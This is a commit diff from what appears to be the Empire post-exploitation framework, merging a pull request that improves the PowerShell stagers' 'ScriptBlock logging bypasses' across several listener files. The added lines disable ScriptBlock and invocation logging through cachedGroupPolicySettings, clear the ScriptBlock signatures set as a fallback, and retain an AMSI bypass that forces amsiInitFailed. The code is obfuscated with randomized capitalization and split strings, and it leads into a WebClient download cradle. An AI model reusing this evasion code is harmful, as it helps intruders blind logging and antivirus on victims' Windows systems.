Merge pull request #740 from cobbr/empire-dev
Improved ScriptBlock logging bypasseswebsockets-multiuser
commit
408782a265
|
@ -175,15 +175,22 @@ class Listener:
|
||||||
|
|
||||||
stager = ''
|
stager = ''
|
||||||
if safeChecks.lower() == 'true':
|
if safeChecks.lower() == 'true':
|
||||||
|
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
|
||||||
|
|
||||||
# ScriptBlock Logging bypass
|
# ScriptBlock Logging bypass
|
||||||
stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(")
|
stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
|
||||||
stager += "'System.Management.Automation.Utils'"
|
stager += "'System.Management.Automation.Utils'"
|
||||||
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
|
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
|
||||||
stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
|
stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
|
||||||
stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
|
stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
|
||||||
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;"
|
stager += "['ScriptB'+'lockLogging']"
|
||||||
stager += helpers.randomize_capitalization("$GroupPolicySettings")
|
stager += helpers.randomize_capitalization("){$GPS")
|
||||||
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
|
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
|
||||||
|
stager += helpers.randomize_capitalization("$GPS")
|
||||||
|
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
|
||||||
|
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
|
||||||
|
stager += "'signatures','N'+'onPublic,Static'"
|
||||||
|
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
|
||||||
|
|
||||||
# @mattifestation's AMSI bypass
|
# @mattifestation's AMSI bypass
|
||||||
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
|
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
|
||||||
|
@ -191,6 +198,7 @@ class Listener:
|
||||||
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
|
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
|
||||||
stager += "'amsiInitFailed','NonPublic,Static'"
|
stager += "'amsiInitFailed','NonPublic,Static'"
|
||||||
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
|
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
|
||||||
|
stager += "}"
|
||||||
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
|
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
|
||||||
|
|
||||||
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
|
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
|
||||||
|
|
|
@ -192,15 +192,22 @@ class Listener:
|
||||||
|
|
||||||
stager = ''
|
stager = ''
|
||||||
if safeChecks.lower() == 'true':
|
if safeChecks.lower() == 'true':
|
||||||
|
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
|
||||||
|
|
||||||
# ScriptBlock Logging bypass
|
# ScriptBlock Logging bypass
|
||||||
stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(")
|
stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
|
||||||
stager += "'System.Management.Automation.Utils'"
|
stager += "'System.Management.Automation.Utils'"
|
||||||
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
|
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
|
||||||
stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
|
stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
|
||||||
stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
|
stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
|
||||||
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;"
|
stager += "['ScriptB'+'lockLogging']"
|
||||||
stager += helpers.randomize_capitalization("$GroupPolicySettings")
|
stager += helpers.randomize_capitalization("){$GPS")
|
||||||
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
|
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
|
||||||
|
stager += helpers.randomize_capitalization("$GPS")
|
||||||
|
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
|
||||||
|
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
|
||||||
|
stager += "'signatures','N'+'onPublic,Static'"
|
||||||
|
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
|
||||||
|
|
||||||
# @mattifestation's AMSI bypass
|
# @mattifestation's AMSI bypass
|
||||||
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
|
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
|
||||||
|
@ -208,6 +215,7 @@ class Listener:
|
||||||
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
|
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
|
||||||
stager += "'amsiInitFailed','NonPublic,Static'"
|
stager += "'amsiInitFailed','NonPublic,Static'"
|
||||||
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
|
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
|
||||||
|
stager += "}"
|
||||||
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
|
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
|
||||||
|
|
||||||
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
|
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
|
||||||
|
|
|
@ -172,15 +172,22 @@ class Listener:
|
||||||
|
|
||||||
stager = ''
|
stager = ''
|
||||||
if safeChecks.lower() == 'true':
|
if safeChecks.lower() == 'true':
|
||||||
|
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
|
||||||
|
|
||||||
# ScriptBlock Logging bypass
|
# ScriptBlock Logging bypass
|
||||||
stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(")
|
stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
|
||||||
stager += "'System.Management.Automation.Utils'"
|
stager += "'System.Management.Automation.Utils'"
|
||||||
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
|
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
|
||||||
stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
|
stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
|
||||||
stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
|
stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
|
||||||
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;"
|
stager += "['ScriptB'+'lockLogging']"
|
||||||
stager += helpers.randomize_capitalization("$GroupPolicySettings")
|
stager += helpers.randomize_capitalization("){$GPS")
|
||||||
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
|
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
|
||||||
|
stager += helpers.randomize_capitalization("$GPS")
|
||||||
|
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
|
||||||
|
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
|
||||||
|
stager += "'signatures','N'+'onPublic,Static'"
|
||||||
|
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
|
||||||
|
|
||||||
# @mattifestation's AMSI bypass
|
# @mattifestation's AMSI bypass
|
||||||
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
|
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
|
||||||
|
@ -188,6 +195,7 @@ class Listener:
|
||||||
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
|
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
|
||||||
stager += "'amsiInitFailed','NonPublic,Static'"
|
stager += "'amsiInitFailed','NonPublic,Static'"
|
||||||
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
|
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
|
||||||
|
stager += "}"
|
||||||
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
|
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
|
||||||
|
|
||||||
# TODO: reimplement stager retries?
|
# TODO: reimplement stager retries?
|
||||||
|
|
|
@ -147,15 +147,22 @@ class Listener:
|
||||||
|
|
||||||
stager = ''
|
stager = ''
|
||||||
if safeChecks.lower() == 'true':
|
if safeChecks.lower() == 'true':
|
||||||
|
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
|
||||||
|
|
||||||
# ScriptBlock Logging bypass
|
# ScriptBlock Logging bypass
|
||||||
stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(")
|
stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
|
||||||
stager += "'System.Management.Automation.Utils'"
|
stager += "'System.Management.Automation.Utils'"
|
||||||
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
|
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
|
||||||
stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
|
stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
|
||||||
stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
|
stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
|
||||||
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;"
|
stager += "['ScriptB'+'lockLogging']"
|
||||||
stager += helpers.randomize_capitalization("$GroupPolicySettings")
|
stager += helpers.randomize_capitalization("){$GPS")
|
||||||
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
|
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
|
||||||
|
stager += helpers.randomize_capitalization("$GPS")
|
||||||
|
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
|
||||||
|
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
|
||||||
|
stager += "'signatures','N'+'onPublic,Static'"
|
||||||
|
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
|
||||||
|
|
||||||
# @mattifestation's AMSI bypass
|
# @mattifestation's AMSI bypass
|
||||||
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
|
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
|
||||||
|
@ -163,6 +170,7 @@ class Listener:
|
||||||
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
|
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
|
||||||
stager += "'amsiInitFailed','NonPublic,Static'"
|
stager += "'amsiInitFailed','NonPublic,Static'"
|
||||||
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
|
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
|
||||||
|
stager += "}"
|
||||||
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
|
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
|
||||||
|
|
||||||
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
|
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
|
||||||
|
|
|
@ -126,15 +126,22 @@ class Listener:
|
||||||
|
|
||||||
stager = ''
|
stager = ''
|
||||||
if safeChecks.lower() == 'true':
|
if safeChecks.lower() == 'true':
|
||||||
|
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
|
||||||
|
|
||||||
# ScriptBlock Logging bypass
|
# ScriptBlock Logging bypass
|
||||||
stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(")
|
stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
|
||||||
stager += "'System.Management.Automation.Utils'"
|
stager += "'System.Management.Automation.Utils'"
|
||||||
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
|
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
|
||||||
stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
|
stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
|
||||||
stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
|
stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
|
||||||
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;"
|
stager += "['ScriptB'+'lockLogging']"
|
||||||
stager += helpers.randomize_capitalization("$GroupPolicySettings")
|
stager += helpers.randomize_capitalization("){$GPS")
|
||||||
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
|
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
|
||||||
|
stager += helpers.randomize_capitalization("$GPS")
|
||||||
|
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
|
||||||
|
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
|
||||||
|
stager += "'signatures','N'+'onPublic,Static'"
|
||||||
|
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
|
||||||
|
|
||||||
# @mattifestation's AMSI bypass
|
# @mattifestation's AMSI bypass
|
||||||
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
|
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
|
||||||
|
@ -142,6 +149,7 @@ class Listener:
|
||||||
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
|
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
|
||||||
stager += "'amsiInitFailed','NonPublic,Static'"
|
stager += "'amsiInitFailed','NonPublic,Static'"
|
||||||
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
|
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
|
||||||
|
stager += "}"
|
||||||
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
|
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
|
||||||
|
|
||||||
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
|
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
|
||||||
|
|
|
@ -175,15 +175,23 @@ class Listener:
|
||||||
|
|
||||||
stager = ''
|
stager = ''
|
||||||
if safeChecks.lower() == 'true':
|
if safeChecks.lower() == 'true':
|
||||||
|
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
|
||||||
|
|
||||||
# ScriptBlock Logging bypass
|
# ScriptBlock Logging bypass
|
||||||
stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(")
|
stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
|
||||||
stager += "'System.Management.Automation.Utils'"
|
stager += "'System.Management.Automation.Utils'"
|
||||||
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
|
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
|
||||||
stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
|
stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
|
||||||
stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
|
stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
|
||||||
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;"
|
stager += "['ScriptB'+'lockLogging']"
|
||||||
stager += helpers.randomize_capitalization("$GroupPolicySettings")
|
stager += helpers.randomize_capitalization("){$GPS")
|
||||||
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
|
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
|
||||||
|
stager += helpers.randomize_capitalization("$GPS")
|
||||||
|
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
|
||||||
|
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
|
||||||
|
stager += "'signatures','N'+'onPublic,Static'"
|
||||||
|
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
|
||||||
|
stager += "}"
|
||||||
|
|
||||||
# @mattifestation's AMSI bypass
|
# @mattifestation's AMSI bypass
|
||||||
stager += helpers.randomize_capitalization('Add-Type -assembly "Microsoft.Office.Interop.Outlook";')
|
stager += helpers.randomize_capitalization('Add-Type -assembly "Microsoft.Office.Interop.Outlook";')
|
||||||
|
|
Loading…
Reference in New Issue